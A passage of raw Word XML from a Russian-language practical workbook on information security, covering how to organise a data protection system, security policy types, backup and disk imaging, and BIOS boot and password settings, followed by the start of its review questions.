                <w:w w:val="80"/>
              </w:rPr>
              <w:t>Л</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М</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Н</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О</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П</w:t>
            </w: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24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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4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25</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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>23</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19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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4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right="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="99"/>
              </w:rPr>
              <w:t>8</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20" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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9</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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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4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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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33</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4</w:t>
            </w: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23"/>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7"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="97"/>
              </w:rPr>
              <w:t>Р</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2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="82"/>
              </w:rPr>
              <w:t>С</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Т</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5"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="95"/>
              </w:rPr>
              <w:t>У</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2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="92"/>
              </w:rPr>
              <w:t>Ф</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:gridSpan w:val="4"/>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6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="96"/>
              </w:rPr>
              <w:t>Х</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Ц</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1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="81"/>
              </w:rPr>
              <w:t>Ч</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0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="90"/>
              </w:rPr>
              <w:t>Ш</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0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="90"/>
              </w:rPr>
              <w:t>Щ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="91"/>
              </w:rPr>
              <w:t>Ъ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="81"/>
              </w:rPr>
              <w:t>Ы</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0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="90"/>
              </w:rPr>
              <w:t>Ь</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Э</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Ю</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Я</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73"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="24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4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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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w w:val="89"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B45DB0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:w w:val="89"/>
              </w:rPr>
              <w:t>15</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28</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12</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20" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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80" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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22</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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34</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="28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29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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27</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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gridSpan w:val="2"/>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17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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16</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24</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23"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="1198" w:right="840" w:bottom="993" w:left="1420" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9640"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="page17"/>
      <w:bookmarkStart w:id="18" w:name="_Toc3808613"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая работа №</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:t>5. Организация системы защиты информации</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="304"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Методические указания</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="26" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>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Построение системы защиты информации — это процесс поиска компромисса между уровнем защищенности и информационной системы и сохранением возможности ее работоспособности.</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При построении системы защиты информации необходимо учитывать организационную структуру экономического объекта (организации, отрасли и т.д.); объем и характер информационных потоков, объем и характер выполняемых экономических операций и т.п.</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Этапы построения системы защиты информации: анализ, оценка возможных и реальных информационных угроз, планирование, разработка проекта, реализация и постоянный контроль за качеством работой системы защиты информации.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1104"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="706"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>настоящему времени сформировались два основных способа реализации механизмов защиты: «добавленная» и «встроенная». В первом из них механизмы защиты не реализованы в программном и аппаратном обеспечении информационной системы или реализована только часть их, необходимая для обеспечения работоспособности всей информационной системы, а во втором – механизмы защиты являются неотъемлемой частью информационной системы, разработанной и реализованной с учетом определенных требований безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Обычно план содержит следующие группы сведений: политика безопасности, текущее состояние информационной системы, рекомендации по реализации системы защиты и ответственность персонала, порядок ввода в действие средств защиты и пересмотра плана и состава средств защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="249" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Политика информационной безопасности определяется как совокупность документированных управленческих решений, направленных на защиту информации и связанных с ней информационных ресурсов, и может быть избирательной и полномочной.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="2" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>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Избирательная политика информационной безопасности подразумевает, что все субъекты и объекты информационной системы должны быть идентифицированы; права доступа субъекта к объекту системы определяются на основании внешнего (по отношению к системе) правила. Полномочная политика информационной безопасности предполагает, что все субъекты и объекты системы однозначно идентифицированы; каждому объекту системы присвоена метка критичности, определяющая ценность содержащейся в нем информации; каждому субъекту системы присвоен уровень прозрачности, определяющий максимальное значение метки критичности объектов, к которым субъект имеет доступ. Основным ее назначением является регулирование доступа субъектов системы к объектам с различным уровнем критичности и предотвращение утечки информации с верхних уровней должностной иерархии на нижние, а также блокирование возможных проникновении с нижних уровней на верхние.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="6" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>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Основные функции служб информационной безопасности на этапе проектирования или совершенствования системы информационной безопасности заключаются в формировании требований к системе информационной безопасности и участие в разработке компонентов и системы информационной безопасности в целом, а на этапе эксплуатации – в планировании, организации и обеспечении функционирования системы информационной безопасности, обучении пользователей и технического персонала организации формам и методам эксплуатации технических средств и контроле за соблюдением пользователями и техническим персоналом правил работы и эксплуатации технических средств в части обеспечения информационной безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="4" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="277" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Резервное копирование (backup) – это процесс создания копии данных на носителей, предназначенных для их восстановления в случае повреждения или разрушения. Оно может быть полным, дифференциальным, когда хранятся изменения только по отношению к</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="277" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B45DB0" w:rsidRPr="00B45DB0">
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="1191" w:right="840" w:bottom="840" w:left="1420" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="0" w:equalWidth="0">
            <w:col w:w="9640"/>
          </w:cols>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="245" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="page18"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>последнему полному резервному копированию и инкрементным, когда хранятся изменения по отношению к последнему резервному копированию. Оно обеспечивает безопасность работы операционной системы, оперативное возобновления ее работоспособности, сохранность данных пользователей и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="3" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Обычно создается образ данных, включая все текущие настрои операционной системы, файлы пользователей, драйверов, программное обеспечение и т.д. Эта операция осуществляется при помощи специализированных программ (например, Norton Ghost, Acronis True Image, Partition Minitool и т.д.). После выбора источника «Source Drive» (например, системного раздела жесткого диска) можно присвоить имя образу, выбрать степень сжатия и активировать процесс записи образа, а затем и произвести восстановления данных из образа на локальном диске или его разделе (например, пункты главного меню </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">«Local», «Disk» </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «Partition», «To Image» </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «To Partition», «From Image» </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «From Partition») </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>съемных</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>накопителях</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1008"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:firstLine="718"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>последнем случае для восстановления данных необходимо установить порядок загрузки операционной системы в соответствующих разделах BIOS («BIOS Features» или</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">«Boot options», «Hard Disk Boot Priority», «First Boot Device», «Second Boot Device» </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="241" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>меню которое можно вызвать до запуска операционной системы. Возможные состояния элементов, отвечающих за порядок загрузки: CDROM, Hard Disk, USB Flash и т.д. Дополнительную защиту от несанкционированного доступа позволяет получить раздел «Set supervisor password», который позволяет установить пароль на запуск операционной системы. После завершения этих операций необходимо сохранить внесенные изменения в параметры загрузки с помощью соответствующего раздела меню BIOS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="245"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вопросы по теме</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0">
      <w:pPr>
        <w:spacing w:line="26" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:line="0" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:hanging="362"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Особенности и этапы построения системы защиты информации</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
